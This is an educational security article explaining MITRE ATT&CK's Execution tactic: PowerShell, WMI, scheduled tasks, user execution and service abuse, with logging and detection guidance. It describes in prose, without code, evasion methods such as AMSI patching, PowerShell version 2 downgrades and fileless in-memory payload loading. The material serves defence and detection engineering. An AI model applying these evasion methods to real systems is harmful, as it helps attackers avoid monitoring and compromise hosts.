Continue your mission
How attackers run malicious code on target systems. Execution is MITRE ATT&CK TA0002, the tactic that activates code delivered through initial access or persistence mechanisms. Covers PowerShell, WMI, scheduled tasks, user execution, and detection strategies.
# Execution Techniques (MITRE ATT&CK TA0002)
Execution is the adversary's second move. After gaining initial access, attackers must run their malicious code within the target environment to achieve any meaningful objective. MITRE ATT&CK categorizes this as Tactic TA0002, and it encompasses every method an attacker uses to cause malicious code to execute on a local or remote system.
Execution does not happen in isolation. It is almost always paired with another tactic: persistence mechanisms use execution to run code at startup, lateral movement techniques use execution to operate on remote systems, and privilege escalation relies on execution to trigger exploits. Understanding execution as a tactic means understanding the connective tissue that links every other phase of an attack together.
The most important characteristic of modern execution techniques is their preference for legitimacy. Attackers overwhelmingly favor techniques that abuse tools and interpreters already present on the target system, a strategy broadly called "living off the land" (LotL). When an attacker uses PowerShell, WMI, or the Windows Task Scheduler to execute code, those processes appear legitimate to operating systems and security tools that lack deep behavioral analysis. The malicious intent is hidden inside a trusted host process.
This makes execution one of the highest-signal tactical categories for detection engineers. The processes involved are known. The event logs are available. The behavioral anomalies are well-documented. Organizations that invest in execution-layer telemetry can detect attacks that evade perimeter and signature-based controls entirely.
T1059 is the most widely exploited execution technique by volume. It covers every built-in scripting capability present on modern operating systems. Attackers do not need to introduce new executables when the target already runs a full-featured scripting engine by default.
PowerShell (T1059.001) is the dominant sub-technique across all threat actor categories, from commodity malware operators to nation-state groups. PowerShell's appeal is its power: it provides direct access to the .NET framework, the Windows API, and the filesystem, all through a built-in interpreter that is trusted by the operating system. Attackers use it for fileless execution (loading shellcode or assemblies directly into memory without touching disk), for downloading and executing remote payloads, and for interacting with Active Directory and remote systems through built-in cmdlets.
The fileless execution path is particularly significant. A PowerShell command can download a malicious payload from an attacker-controlled server, load it into memory as a .NET assembly, and execute it without writing a single file to disk. Traditional antivirus products that scan the filesystem see nothing to flag. Without script block logging enabled, the command itself is never recorded.
Defense evasion layered on top of PowerShell execution includes Base64 encoding (to obscure command content from simple string matching), AMSI bypass techniques (the Antimalware Scan Interface is the primary mechanism by which security tools inspect PowerShell commands at runtime, and several bypass methods exist to disable it before running malicious code), and the PowerShell downgrade attack (explicitly invoking PowerShell version 2.0, which predates script block logging and AMSI, causing the execution to run outside the logging framework).
Windows Command Shell (T1059.003) covers cmd.exe and batch file execution. Though less capable than PowerShell, cmd.exe is present on every Windows system and is often allowed by application control policies. Batch files (.bat, .cmd) are commonly delivered as phishing attachments or dropped as secondary payloads.
Unix Shell (T1059.004) is the Linux and macOS equivalent: bash, sh, zsh, and other POSIX shells. Shell scripts are heavily used in attacks against Linux servers and cloud infrastructure. Cron jobs executing shell scripts combine T1059.004 with T1053 (scheduled tasks) for persistence-plus-execution in a single technique.
Visual Basic (T1059.005) encompasses VBScript (.vbs files) and macros embedded in Office documents (.docm, .xlsm). Office macros were the dominant phishing payload delivery mechanism for over a decade before Microsoft's 2022 decision to block macros from internet-sourced files by default. Despite this control, macros remain effective against organizations that have not enforced the policy or that are targeted through network shares rather than email attachments.
JavaScript (T1059.007) covers JavaScript executed through Windows Script Host via wscript.exe and cscript.exe. JavaScript payloads are frequently delivered as .js or .jse files in phishing emails and are often used as droppers that download a more capable second-stage payload.
WMI is one of the most powerful administrative frameworks built into Windows and one of the most heavily abused execution techniques at the advanced threat actor level. WMI provides remote execution capability, a persistent event subscription system, and access to virtually every aspect of Windows system state, all through infrastructure that is trusted, built-in, and enabled by default.
Attackers use WMI for two primary execution purposes: running commands on remote systems (using Win32_Process.Create via DCOM), and establishing WMI event subscriptions that fire on system events (startup, process creation, scheduled intervals) to achieve persistence with execution. The event subscription approach is particularly dangerous because the persistence mechanism lives entirely within the WMI repository, not on the filesystem, making it invisible to file-based forensics.
WMI abuse is difficult to detect without specific telemetry. The wmic.exe binary and the underlying WMI service are legitimate and expected. Detection requires WMI activity logging (Microsoft-Windows-WMI-Activity/Operational event log) or endpoint detection and response (EDR) tools that instrument WMI at the API level.
Scheduled tasks (T1053.005 on Windows) and systemd timers (T1053.006 on Linux) serve dual purposes in the attack lifecycle: they provide both execution and persistence in a single technique. An attacker who creates a scheduled task that runs every 60 minutes has also established a mechanism to re-execute their payload even after detection and remediation of the initial infection vector.
Windows scheduled tasks created by attackers often appear in non-standard locations (not the root \Microsoft\Windows\ tree, but under custom folder names), use obscure or system-like names to blend with legitimate tasks, and reference executables or scripts in user writable directories or temporary folders. The task creation event (Windows Event ID 4698) and task modification event (Event ID 4702) are high-fidelity detection signals that should be monitored in every environment.
User execution techniques shift the execution responsibility to the victim. The attacker crafts content designed to trick a user into taking an action that results in code execution.
T1204.001 (Malicious Link) covers clicks that initiate a download followed by execution, or that navigate the browser to an exploit page. T1204.002 (Malicious File) covers every scenario in which the user opens or runs a file delivered through phishing, a download, or a removable media device. Malicious files span a wide range of formats: Office documents with macros, LNK shortcut files, ISO and IMG disk images (used to bypass Mark-of-the-Web, the Windows mechanism that flags internet-sourced files), and executables masquerading as documents through double extensions or misleading icons.
User execution is not a failure of technology alone. It is the technique that adversaries choose when technical controls make automated execution difficult. Security awareness training, email gateway sandboxing, and application control policies that prevent execution of user-downloaded content all reduce T1204 exposure.
T1559 covers execution through legitimate inter-process communication mechanisms that applications expose as design features. Dynamic Data Exchange (DDE) is a legacy protocol that allows one application to request data from or invoke commands in another. DDE execution in Office documents was widely exploited before Microsoft disabled it by default. Component Object Model (COM) objects expose programmatic interfaces that attackers use to invoke execution within trusted host processes, bypassing application control policies that allow those hosts.
T1569.002 (Service Execution) involves creating or modifying a Windows service to execute attacker-controlled code. Services run as SYSTEM by default, making service execution a high-privilege execution technique. Attackers create services with innocuous names, register attacker-controlled executables as the service binary, and start the service. The service entry persists across reboots, combining execution with persistence.
Every tactic before execution (initial access, resource development, reconnaissance) is preparatory. Every tactic after execution (persistence, privilege escalation, lateral movement, exfiltration) is consequential. Execution is the moment the attack becomes active inside the environment. Organizations that detect execution-phase activity early, before privilege escalation and lateral movement are complete, prevent the vast majority of breach impact.
The Ponemon Institute's cost of a data breach research consistently shows that organizations that contain breaches within 30 days spend approximately $1 million less per incident than those that do not. Execution-layer detection is the primary mechanism for early containment: catch the attacker running code before they establish deep persistence and move laterally.
The shift toward living-off-the-land execution (LOLBins: binaries already present on the system, used for malicious purposes) is the single most significant change in attacker technique over the past decade. A 2024 CrowdStrike threat intelligence report noted that malware-free attacks now account for the majority of intrusion activity it tracks. Attackers who use only built-in tools do not need to deliver executables that signature-based antivirus can detect.
This fundamentally changes the detection problem. Organizations relying on signature detection alone have no effective control against T1059.001 (PowerShell), T1047 (WMI), or T1053 (scheduled tasks) when those techniques are used by skilled attackers. Behavioral analytics, command-line argument analysis, and parent-child process relationship monitoring become the primary detection mechanisms.
Execution techniques generate rich telemetry when logging is correctly configured. Every sub-technique under T1059 produces process creation events. PowerShell produces script block logs. WMI produces activity logs. Scheduled tasks produce creation and modification events. Service creation produces System log events. This telemetry density makes execution one of the highest-detection-opportunity tactical categories available to security operations teams.
Three categories of PowerShell logging must be enabled to achieve meaningful visibility:
Constrained Language Mode (CLM) restricts PowerShell to a limited set of types and commands, preventing many common attack techniques that rely on .NET interop and Windows API access. CLM is enforced by Windows Defender Application Control (WDAC) or AppLocker policies.
| Event ID | Log | Description | |----------|-----|-------------| | 4104 | PowerShell/Operational | Script block execution (primary PS detection signal) | | 4688 | Security | Process creation with command-line arguments | | 4698 | Security | Scheduled task created | | 4702 | Security | Scheduled task modified | | 7045 | System | New service installed | | WMI Activity | Microsoft-Windows-WMI-Activity/Operational | WMI query and subscription activity |
Process creation logging (Event ID 4688) must be configured to include command-line arguments, which is not enabled by default. Without command-line logging, the process creation event shows powershell.exe started but does not show what it was told to run.
The Antimalware Scan Interface (AMSI) is a Windows API that allows security products to scan content at runtime, specifically targeting script-based execution that occurs in memory rather than from files. When PowerShell, JScript, or VBScript execution begins, AMSI passes the script content to registered security providers before execution begins.
AMSI bypass techniques work by patching the AmsiScanBuffer function in memory to return a "clean" result regardless of content, or by corrupting the AMSI context structure. Detection of AMSI bypass attempts is possible through behavioral monitoring of memory write operations to the amsi.dll module and through monitoring for specific byte patterns associated with known bypass implementations.
Predictive Defense Intelligence (PDI) is CDA's TID-domain methodology: "See the threat before it sees you." At the execution layer, PDI manifests as pre-built detection coverage that maps every significant execution sub-technique to specific detection rules, primarily expressed as Sigma rules for SIEM deployment.
CDA's TID detection engineering work maintains execution technique coverage across the full T1059 sub-technique tree, T1047, T1053, T1204, and T1569. Each technique maps to one or more Sigma rules, each rule maps to required log sources, and each log source maps to a configuration requirement. When a log source is missing (PowerShell script block logging not enabled, process creation command-line arguments not captured), the coverage gap is surfaced as a detection gap in the Shield assessment.
The practical consequence: an organization that has deployed a SIEM but has not enabled PowerShell script block logging has a blind spot for the highest-volume execution technique in the ATT&CK matrix. PDI identifies that gap before an attacker exploits it.
Execution sits primarily within TID (Threat Intelligence and Defense), but the defensive controls span multiple PDM domains. Endpoint controls (EDR deployment, application control policy enforcement) are an SPH (Security Posture and Hygiene) responsibility under the Autonomous Posture Command (APC) methodology. Identity controls that limit which users can install services or create scheduled tasks are an IAT (Identity Access and Trust) responsibility under ZPA. Vulnerability management that prevents exploitation-based execution is a VSD responsibility under CSR.
This is why The Shield assessment evaluates execution-layer detection as a multi-domain problem. TID provides the detection capability. SPH provides the endpoint hardening that makes many execution techniques fail before detection is even needed. IAT provides the least-privilege controls that constrain what executed code can do. A mature execution defense posture requires all three domains working simultaneously.
MITRE Corporation. "Execution (TA0002)." MITRE ATT&CK, 2024. https://attack.mitre.org/tactics/TA0002/
MITRE Corporation. "Command and Scripting Interpreter (T1059)." MITRE ATT&CK, 2024. https://attack.mitre.org/techniques/T1059/
Microsoft. "About Script Block Logging." Microsoft PowerShell Documentation, 2024. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows
CrowdStrike. "2024 Global Threat Report." CrowdStrike, 2024. https://www.crowdstrike.com/global-threat-report/
Ponemon Institute. "Cost of a Data Breach Report 2024." IBM Security, 2024. https://www.ibm.com/reports/data-breach
Mandiant. "M-Trends 2024 Special Report." Google Cloud, 2024. https://www.mandiant.com/m-trends
Lee, R. and Bianco, D. "The Pyramid of Pain." Dragos, 2014. https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
CDA, LLC. "Predictive Defense Intelligence (PDI) Methodology Reference." CDA Canon, 2026.
CDA Theater missions that address topics covered in this article.
Lazarus Group is North Korea's primary advanced persistent threat operation, operating under the RGB (Reconnaissance General Bureau), the DPRK's primary foreign intelligence service.
Salt Typhoon is a Chinese state-sponsored advanced persistent threat (APT) group that conducts signals intelligence collection operations against telecommunications infrastructure.
Evidence collection, chain of custody, forensic imaging, and analysis techniques for incident investigations.
Written by Evan Morgan
Found an issue? Help improve this article.